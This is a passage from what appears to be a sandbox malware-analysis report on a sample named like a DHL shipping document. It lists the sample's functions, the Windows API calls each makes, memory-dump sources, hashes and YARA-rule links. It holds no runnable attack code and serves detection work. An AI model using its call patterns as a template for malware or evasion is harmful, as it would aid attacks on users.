                                                                                    • GetLastError.KERNEL32 ref: 00813A73
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00813A82
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0083FAC0), ref: 00813ADF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2267087916-0
                                                                                    • Opcode ID: 7b72890b603a082dd27f4308dcfe358f8eac2491236401ca8e23e729118f56a4
                                                                                    • Instruction ID: 4b03450445d6a6b5e57460f4df472e589e02e11e94b791402fd96b82d8158e19
                                                                                    • Opcode Fuzzy Hash: 7b72890b603a082dd27f4308dcfe358f8eac2491236401ca8e23e729118f56a4
                                                                                    • Instruction Fuzzy Hash: 2B218274508615DF8300EF28C8859EB77ECFE55368F144A29F499C72A2D7319A85CB82
                                                                                    Function 0080DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0080F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0080DCD3,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?), ref: 0080F0CB
                                                                                      • Part of subcall function 0080F0BC: lstrcpyW.KERNEL32(00000000,?,?,0080DCD3,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080F0F1
                                                                                      • Part of subcall function 0080F0BC: lstrcmpiW.KERNEL32(00000000,?,0080DCD3,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?), ref: 0080F122
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080DCEC
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080DD12
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0080EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0080DD46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: 77985e8d5462813d9b4911904e602f3d4ad2e2deac11f676af77c71b09ace6a5
                                                                                    • Instruction ID: 86f4984893cb56a74e7ddb0f432b77ce9ca673c1fc2afcdc7cff11f9acd11c59
                                                                                    • Opcode Fuzzy Hash: 77985e8d5462813d9b4911904e602f3d4ad2e2deac11f676af77c71b09ace6a5
                                                                                    • Instruction Fuzzy Hash: CA11BE3A200305EBDB25AF74DC45D7A77A9FF45310B40842AF906CB2A1EB719C40DBD1
                                                                                    Function 007E50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 007E5101
                                                                                      • Part of subcall function 007D571C: __FF_MSGBANNER.LIBCMT ref: 007D5733
                                                                                      • Part of subcall function 007D571C: __NMSG_WRITE.LIBCMT ref: 007D573A
                                                                                      • Part of subcall function 007D571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,007D0DD3,?), ref: 007D575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: 6640b437a6f2bc02ecda04b28c907bd72541fa1a1aee850e4f0bd738400808a4
                                                                                    • Instruction ID: 85af9a4359d05d23e41c19e32edbaa93c05ade5bc205ea7666fb05dcb06888b0
                                                                                    • Opcode Fuzzy Hash: 6640b437a6f2bc02ecda04b28c907bd72541fa1a1aee850e4f0bd738400808a4
                                                                                    • Instruction Fuzzy Hash: 95110AB1906A5DEFCB312F76EC4975D37A86F08365F20052BF90496351DE3CC8409791
                                                                                    Function 00826369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817896,?,?,00000000), ref: 007B5A2C
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817896,?,?,00000000,?,?), ref: 007B5A50
                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00826399
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008263A4
                                                                                    • _memmove.LIBCMT ref: 008263D1
                                                                                    • inet_ntoa.WSOCK32(?), ref: 008263DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 1504782959-0
                                                                                    • Opcode ID: 224cd6d955805cfb0dcbd3d2009775bec692f8f8d4d2a4cc4d597af630a09fba
                                                                                    • Instruction ID: 9067026adf54f86f869ad09c963820904b901b243451ce53309c536eafa603ac
                                                                                    • Opcode Fuzzy Hash: 224cd6d955805cfb0dcbd3d2009775bec692f8f8d4d2a4cc4d597af630a09fba
                                                                                    • Instruction Fuzzy Hash: 49110A31900109EFCB04FBA4DD4AEEEBBB8FF49310B144465F605A7262DB34AE14DBA1
                                                                                    Function 00808B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00808B61
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00808B73
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00808B89
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00808BA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: f4cf16b871edc3f49971e91e6d619a34d1866ba4606022a264b2b30355c21f8f
                                                                                    • Instruction ID: 513fd2a702a9e57e89032e31abcf9ad319b43a643a1882440f5f725e7d44686b
                                                                                    • Opcode Fuzzy Hash: f4cf16b871edc3f49971e91e6d619a34d1866ba4606022a264b2b30355c21f8f
                                                                                    • Instruction Fuzzy Hash: 93115A79901218FFEB10DFA5CC85FADBBB8FB48310F2040A5EA00B7290DA716E50DB94
                                                                                    Function 007B1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 007B12D8
                                                                                    • GetClientRect.USER32(?,?), ref: 007EB5FB
                                                                                    • GetCursorPos.USER32(?), ref: 007EB605
                                                                                    • ScreenToClient.USER32(?,?), ref: 007EB610
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4127811313-0
                                                                                    • Opcode ID: c6ce6c59b097f297a1527eac05a3db924e4565684b9b42c5432bb62e6ed7a79d
                                                                                    • Instruction ID: 4df7bfb2731a43b1321b9fa0ff2141222551eff9dc9a302a43fcfe1297073ef9
                                                                                    • Opcode Fuzzy Hash: c6ce6c59b097f297a1527eac05a3db924e4565684b9b42c5432bb62e6ed7a79d
                                                                                    • Instruction Fuzzy Hash: 55115836A00019EBCB04EF98C899AEE77B8FB45301F800866FA01E3151C734BA51CBA5
                                                                                    Function 00811142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 0081115F
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 00811184
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 0081118E
                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0080FCED,?,00810D40,?,00008000), ref: 008111C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                    • String ID:
                                                                                    • API String ID: 2875609808-0
                                                                                    • Opcode ID: a26f2234cbc66d472e9b5d447a6407dad33cd396044f4181cb9f70d5ff9bf96f
                                                                                    • Instruction ID: 18c20fd20aa251dff201477ec269bd365ccd9bbfd3a5a5b02bb044233707575e
                                                                                    • Opcode Fuzzy Hash: a26f2234cbc66d472e9b5d447a6407dad33cd396044f4181cb9f70d5ff9bf96f
                                                                                    • Instruction Fuzzy Hash: B011F531D0151DE7CF009FA5E848AEEFB78FF49711F015455EB41A2241CA7095A08B95
                                                                                    Function 0080D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0080D84D
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0080D864
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0080D879
                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0080D897
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                    • String ID:
                                                                                    • API String ID: 1352324309-0
                                                                                    • Opcode ID: 2aa28dc5ccc2befe43c381ff825d45ad3a7393c49bd1ea9908769ba8f92df31e
                                                                                    • Instruction ID: b92ceb8dc69749fc53ced51860dbe6eef9a4e8d6aa2b3509f950742241f322a6
                                                                                    • Opcode Fuzzy Hash: 2aa28dc5ccc2befe43c381ff825d45ad3a7393c49bd1ea9908769ba8f92df31e
                                                                                    • Instruction Fuzzy Hash: D7115E75A05309DBE7208F90ED08F92BBBCFF40B14F10C979AA16D6091D7B0E5499BA1
                                                                                    Function 007E6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction ID: c9a7d03a69129fb21c1205db9de79c9d515a9628e1e731cebd5db1cd813016b4
                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction Fuzzy Hash: 31014B7244A18ABBCF1A5F85CC05CEE3F62BB2C395B588415FE1858031D23AC9B1EB81
                                                                                    Function 0083B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 0083B2E4
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083B2FC
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083B320
                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0083B33B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 357397906-0
                                                                                    • Opcode ID: 23d9bad3e3c65f3ba7e99bd4411f25e56e3940070b6288f3c3950151185c192a
                                                                                    • Instruction ID: 506423bbee2e4f0d2ad8bc91cfeacf9f8a569fdfc373345e8293ad19ffbd3ae0
                                                                                    • Opcode Fuzzy Hash: 23d9bad3e3c65f3ba7e99bd4411f25e56e3940070b6288f3c3950151185c192a
                                                                                    • Instruction Fuzzy Hash: E71147B5D00609EFDB41DF99C4459EEBBF5FF58310F104166E914E3220D735AA558F90
                                                                                    Function 0083B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0083B644
                                                                                    • _memset.LIBCMT ref: 0083B653
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00876F20,00876F64), ref: 0083B682
                                                                                    • CloseHandle.KERNEL32 ref: 0083B694
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3277943733-0
                                                                                    • Opcode ID: e109c392cf7ba40ec4eaa1074bf5ab10dcb7c8c4714006c13b25ded3ef683020
                                                                                    • Instruction ID: dfbdf1fd30ef0060a851d3e56824d8b446a2fe90586b71f4caca4b829f1c633c
                                                                                    • Opcode Fuzzy Hash: e109c392cf7ba40ec4eaa1074bf5ab10dcb7c8c4714006c13b25ded3ef683020
                                                                                    • Instruction Fuzzy Hash: 70F054B1640700BEE21027617C0AF7B3A5CFB15355F004421FB0CE6197EB758C6587A8
                                                                                    Function 00816BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00816BE6
                                                                                      • Part of subcall function 008176C4: _memset.LIBCMT ref: 008176F9
                                                                                    • _memmove.LIBCMT ref: 00816C09
                                                                                    • _memset.LIBCMT ref: 00816C16
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00816C26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 48991266-0
                                                                                    • Opcode ID: 6bb4f45c7242e2bdbf46cfeacc362a3bf600fbdf960b228e9255f98cae745aec
                                                                                    • Instruction ID: 374b33a88b1ff2044994b0eea3768fb70599330bb80bb570657f5fb20c31a788
                                                                                    • Opcode Fuzzy Hash: 6bb4f45c7242e2bdbf46cfeacc362a3bf600fbdf960b228e9255f98cae745aec
                                                                                    • Instruction Fuzzy Hash: 90F03A3A200100ABCF016F55DC89A8ABB2AFF85321F088065FE089E267C775E851CBB5
                                                                                    Function 007B2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 007B2231
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 007B223B
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 007B2250
                                                                                    • GetStockObject.GDI32(00000005), ref: 007B2258
                                                                                    • GetWindowDC.USER32(?,00000000), ref: 007EBE83
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007EBE90
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 007EBEA9
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 007EBEC2
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 007EBEE2
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007EBEED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: ea770effd97fbe45c102fe0c2caa866f6babb37faf838f2c36ee0cdb7c7f6da1
                                                                                    • Instruction ID: cb2f6757921f8f1fed60e1b15ca13f6ae338bf2c5d8334dd7a0a0f308f263329
                                                                                    • Opcode Fuzzy Hash: ea770effd97fbe45c102fe0c2caa866f6babb37faf838f2c36ee0cdb7c7f6da1
                                                                                    • Instruction Fuzzy Hash: 62E03932904284AADF225F64FC0DBD83F10FB45336F008366FB69880E287B14980DB52
                                                                                    Function 00808712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 0080871B
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,008082E6), ref: 00808722
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008082E6), ref: 0080872F
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,008082E6), ref: 00808736
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: d759fa07255971ba6d99e4883a3aa08a0f7d07bf7938b69a0231157ddcc5f4d1
                                                                                    • Instruction ID: 502a8d34f58aaf0aac14ed39ad9c8e340b0a84605a5a4522849c6d0973c3c9f1
                                                                                    • Opcode Fuzzy Hash: d759fa07255971ba6d99e4883a3aa08a0f7d07bf7938b69a0231157ddcc5f4d1
                                                                                    • Instruction Fuzzy Hash: 21E04F36A11211DBDB605FB55D0CB563BA8FF90792F144C28B385C9092DB2484818790
                                                                                    Function 0080B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0080B4BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
